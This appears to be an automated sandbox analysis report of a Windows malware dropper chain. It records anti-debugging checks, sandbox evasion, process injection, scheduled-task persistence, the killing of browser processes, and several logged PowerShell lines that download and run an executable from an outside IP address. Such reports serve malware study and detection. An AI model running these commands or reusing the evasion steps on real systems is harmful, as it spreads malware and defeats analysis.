Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, 0000000B.00000002.1511636399.0000000001053000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000C.00000002.1533252473.0000000000FC3000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000D.00000002.1534657926.0000000000FC3000.00000040.00000001.01000000.0000000E.sdmp, TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, 0000000E.00000002.1551391017.0000000001053000.00000040.00000001.01000000.0000000B.sdmp, 6d81c0d08d.exe, 00000015.00000002.2893639536.0000000000EB6000.00000040.00000001.01000000.00000012.sdmp, 0a633717d1.exe, 00000017.00000002.2663262692.0000000000F76000.00000040.00000001.01000000.00000013.sdmp, 327981c77b.exe, 00000019.00000002.2508007909.0000000000E64000.00000040.00000001.01000000.00000015.sdmp, 327981c77b.exe, 0000002E.00000002.2790900810.0000000000E64000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 00000023.00000002.2766482682.0000000007199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll44

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	File opened: NTICE
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	File opened: SICE
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	File opened: SIWVID

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

Code function: 11_2_05860CD0 rdtsc

11_2_05860CD0

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D4EAA2 BlockInput,

0_2_00D4EAA2

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00D02622

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00CD42DE

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CF4CE8 mov eax, dword ptr fs:[00000030h]

0_2_00CF4CE8

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D30B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00D30B62

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D02622
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CF083F
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF09D5 SetUnhandledExceptionFilter,	0_2_00CF09D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CF0C21

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7900.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_8144.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7824.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6104.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 8076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 1240, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5612, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: random[3].exe.18.dr, Builder.cs	Reference to suspicious API methods: Program.VirtualProtect(ref Program.inputData[0], Program.inputData.Length, 64u, ref lpflOldProtect)
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, Outils.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, Outils.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Memory written: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Memory written: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\random.exe

0_2_00D31201

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D12BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D12BA5

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D3B226 SendInput,keybd_event,

0_2_00D3B226

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00D522DA

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe "C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe "C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe "C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe "C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe "C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe "C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE "C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: C:\Users\user\Desktop\random.exe

0_2_00D30B62

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D31663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00D31663

Source: random.exe, 00000000.00000002.1426156970.0000000000D92000.00000002.00000001.01000000.00000003.sdmp, 1f8e467ee9.exe, 0000001B.00000002.2756179824.0000000000FB2000.00000002.00000001.01000000.00000016.sdmp, 84b9c8b064.exe, 0000001F.00000000.2537530343.0000000000B12000.00000002.00000001.01000000.00000017.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 0a633717d1.exe, 0a633717d1.exe, 00000017.00000002.2663262692.0000000000F76000.00000040.00000001.01000000.00000013.sdmp, 327981c77b.exe, 00000019.00000002.2508007909.0000000000E64000.00000040.00000001.01000000.00000015.sdmp, 327981c77b.exe, 0000002E.00000002.2790900810.0000000000E64000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Program Manager
Source: random.exe	Binary or memory string: Shell_TrayWnd
Source: 6d81c0d08d.exe, 6d81c0d08d.exe, 00000015.00000002.2893639536.0000000000EB6000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: 2Program Manager
Source: skotes.exe, skotes.exe, 0000000D.00000002.1534657926.0000000000FC3000.00000040.00000001.01000000.0000000E.sdmp, TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, 0000000E.00000002.1551391017.0000000001053000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: fProgram Manager

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CF0698 cpuid

0_2_00CF0698

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
